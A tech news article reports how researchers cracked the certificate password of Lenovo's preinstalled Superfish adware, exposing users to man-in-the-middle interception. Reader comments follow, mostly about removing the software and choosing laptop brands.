Lenovo's Superfish adware cracked with relative ease, exposing users to attacks

This story just keeps getting worse for Lenovo. After getting called out for inserting additional ads into user's browsing experience and claiming to have disabled and stopped installing the offending software, Lenovo's "Superfish" adware has seen its certificate cracked by security researchers. The worst part is, it evidently was easy to break the app's security. The end result is that affect Lenovo computer users — and there are potentially hundreds of thousands of them — could see their computers needlessly exposed to attack.

Per computer security researcher Rob Graham:

"I extracted the certificate from the SuperFish adware and cracked the password ("komodia") that encrypted it. […] The consequence is that I can intercept the encrypted communications of SuperFish's victims (people with Lenovo laptops) while hanging out near them at a cafe wifi hotspot."

Learn more about malware and antivirus for Windows

The worst part is that the certificate was cracked using a run-of-the-mill dictionary attack, running through words in the dictionary until access was granted. And so, within 10 seconds, Graham was in and able to run "man-in-the-middle" traffic interception attacks on any affected Lenovo user with Superfish installed.

What's frightening about this sort of attack is that it offers access to your outgoing and incoming data. The attacker can simply record it, or can actually intercept and change what you're downloading or uploading, all without your knowledge.

Source: Errata Security; Via: The Verge

Derek Kessler is Special Projects Manager for Mobile Nations. He's been writing about tech since 2009, has far more phones than is considered humane, still carries a torch for Palm, and got a Tesla because it was the biggest gadget he could find. You can follow him on Twitter at @derekakessler.

57 Comments
  • How can you remove superfish from your laptop?
  • Look for a suspicious program or folder
  • Flash the os with a new os, not the recovery disk. Al though Lenovo are saying the malware should note be nonresponsive.
    What I do is take out the ssd/hdd and use my own.
  • Does this mean we should also question using Lenovo's SHAREit software?
  • You should question anything that comes preinstalled on a new laptop. You buy a laptop, you wipe the hard drive, install with your own disc/usb.
  • It appears to be an addon in the browser. So, you can disable it by managing the addons in the settings. You can check the installed programs to see if you can uninstall it from there. The bug issue is the security certificate.  You can remove it manually, though, by pressing Windows key + R on your keyboard to bring up the Run tool, then search for certmgr.msc to open your PC's certificate manager. Once open, click "Trusted root certificate authorities" in the navigation pane on the left and double-click "Certificates" in the central pane.  You'll now see a list of trusted root certificates. Locate Superfish, and then right click and press Delete.
  • Shouldn't it be removable from "Add or Remove Programs?"
  • There appear to be a couple of new software programs that will tell you if its installed...
  • Also from Internet Option, go to Content > Certificates and look for Superfish's certificate and delete it.
  • http://arstechnica.com/security/2015/02/how-to-remove-the-superfish-malw...
  • A really bad day for them
  • This is sad.. Thank god I'm not a Lenovo fan.. I feel like Lenovo customers should sue the company for installing an adware without their knowledge
  • I was going to buy yoga 3 shortly but I hate adware so much I am going to go for anther band now.
  • Get the surface dude
  • Seriously, grab the Surface. It's a dream to use.
  • Buy the signature edition throught the microsoft store. This is why windows has a bad reputation. The OEMs have trashed the windows ecosystem. Windowshas been stable for years, but it still has a bad rep because of the bad driver and software the OEMs insttalled. Microsoft got controll of the drivers by starting to certify them. The OEMs started making better PC after Microsoft released the surface. Now microsoft has to get the oems to release signature edition PCs at other retailers.
  • So essentially they could make it so you download illegal stuff without your consent and then get you incarcerated for it despite it being a hacker, not you, that did it?
  • In theory, yes. Though that be a really vindictive hacker. Not to mention you'd probably be able to prove that that's something you didn't do. What's more likely to happen is intercepting of account info or even changing of something like to what account you're transferring money on your bank's website.
  • Yup. Though going to certain sites can do that. Think I read something recently about sites being hijacked - using the cookies to install junk. Good grief. Between this rubbish and the stuff certain agencies PUT DIRECTLY ON THE BALLY HARD DRIVES now more than ever we should have the ability to change the hdd and ram. Humph.
  • I mean, technically yes, but you should be far more concerned with your personal info being stolen than someone redirecting your traffic to pirate something...
  • Use Firefox and you're safe from this rubbish. Firefox FTW, once again.
  • Please, inform yourself: http://arstechnica.com/security/2015/02/how-to-remove-the-superfish-malw...
  • I am glad i don't use lenovo
  • thats really frightening wondering how much $$$$ the chinese company was paid by google for installing the Adware aka spyware wondering what if the same shit is on Lenovo Android devices also 
  • Wait, how is this Google's fault now? 
  • Everything related to spying has to do with Google
  • Disclaimer: I can't tell if you're being sarcastic, if you were, then please take my comment as sarcasm.   Oh, ok.  Let me see if I understand this correctly....So, at no time in human history was there such a thing as spying until Google came along.     OR there was spying before Google but now that Google came along and has a business model based on data collection of thier customers--which Microsoft also does to an extent, by the way, and REALLY wishes that Bing gets as popular or more than Google.com so they too can collect data from their customers to *gasp* sell ads--for sale of ads, they suddenly own the whole concept of spying, so anything that remotely resembles spying MUST be attributed to Google.     Am I close?  Just trying to understand how one comes to the conclusion that Starfish is somehow, someway, Google's fault.     Or do we all hate Google and anything bad is just...*sigh*....Google's fault?  Sorry, I get tired of seeing people be so irrational because they either love or hate some company.  It's the same thing when people go around bashing Microsoft--or as they write it, "Micro$soft", as if a company is somehow bad because their goal is to make money.   
  • I mean, Google may have nothing to do with it but in all honesty, their name is synonymous to the word "ads".. And they've been known to sneak into their users' email accounts to present more "suitable ads" for them. Microsoft is nothing like that. Other than that, you can clearly see his name.. no_android.. I mean, I agree with his name but he is a hater to an extent so don't expect much out of his comments.,
  • Yes i hate android, google policies on Ads ,user privacy.  1. I hate android android 'coz it comes preinstalled with blotware or someother stuff with enables hackers to gain access / helps google to inject Ads into my smart/phone. 2. I hate google policies on Ads 'coz they are very annoying i mean it literally annoying. WTH Ads in youtube videos too ?? 3. I hate the way google takes user privacy. do you people understand what is meant by PRIVACY. i didn't signup to gmail so that google can read my email content all the time every time. I hope u understood why i hate google.
  • Dude, the fact that you hate Google was never in dispute, nor was I trying to change your mind.  Please, go on hating Google; many people do.  I was just wondering how you connected Google to Superfish--like genuinly wondering.  I mean, if you order a meal at a restarurant and it comes out undrecooked, do you blame Google???  Global warming is an issue?  Google!  Got dumped by your girlfriend?  Google!     My point is, if you have some context to your hate of Google instead of randomly injecting jibes at them at any random issue, people might take your point of view more seriously instead of just seeing you as some jaded lover.   Last point is that if you hate having your privacy violated, then you should add to your screen name no_android_google_or_facebook because facebook has so much info about your personal life that it actually makes Google green with envy.      
  • Even the name "Superfish" screams malware.
  • I uninstalled all the bloatware I could find on my new Lenovo. Is there an easy way to check if superfish is still intercepting my browsing?
  • I dodged a bullet by buying a different laptop, apparently.
  • This thing is super fishy.
  • http://i0.kym-cdn.com/photos/images/original/000/000/681/what-you-did-th...
  • I wonder how much Lenovo's share price will fall today lol...
     
  • Hahaha
  • All laptops should be signature editions. Bloat ware should be illegal
  • I was under the impression this was on consumer laptops, not Thinkpads.  Can you clarify?  If it's not on the business line you should change out that Thinkpad picture.
  • Superfish could be installed on ThinkPads sold through retail channels, but not those sold directly to businesses.
  • Lenovo should immediately issue an update to remove Superfish  The problem is that many users don't install manufacturer-issued updates. Superfish demonstrates the weakness of PC security on Windows machines. This kind of software should automatically be cleaned from affected PCs. No wonder so many people use Macs.
  • this has absolutely zero to do with Windows and such a program could just as easily be coded and made operational on an OSX machine or Linux box. the only thing you could say is that Apple isn't likely to preinstall such software on their machines, but then again, not many companies do, Lenovo excluded.
  • We will continue buying Lenovo kit for the office but have always had a policy of wiping the drive and loading a standard image.
  • Do you trust their bios code which you cannot overwrite?
  • Why would anyone purchase a laptop with bloatware is beyond me.
  • Because all that bloatware makes 'em cheaper. Most people don't or can't spend an arm and a leg for a laptop. Price is important and in order to bring the price down, we get Bloatware, adware, etc.
  • Love the Chinese huh? Actually this is exactly one of the reasons I moved entirely to Apple about 10 years ago. Windows phone and apple politics is what is bringing me back. But this stuff is not helping.
  • Solution? Simple, don't buy Lenovo!
  • I wish I'd had known about the 'Signature Edition' when we purchased my son his Lenovo Y50.  Nice computer, but man, never again!   Is the real fix ultimately to buy 8.1 and install it myself?    
  • In the meantime, browse with Firefox. It is immune to all this stuff.
  • Stop spreading misinformation! There's a section for Firefox: http://arstechnica.com/security/2015/02/how-to-remove-the-superfish-malw...
  • Ouch. Hopefully this will force Lenovo to permanently disable Superfish. This recently happened with the Samsung smart TVs, and the carrier supercookies. I wonder when OEMs and others realize further monitization of personal products leads to privacy and security concerns. Probably not for awhile. Posted via Galaxy Tab 4
  • Why are you using a Thinkpad picture if it's affected by the malware?
  • It's malware, not adware!
     
  • Ok, what are ads? :|
  • Users can't afford such kind of security threats.
  • Sounds like its not just a Lenovo problem now.    Superfish vulnerability traced to other apps, too http://www.pcworld.com/article/2887253/superfish-vulnerability-traced-to...   Here is a list of other vendor affected. Vulnerability Note VU#529496 http://www.kb.cert.org/vuls/id/529496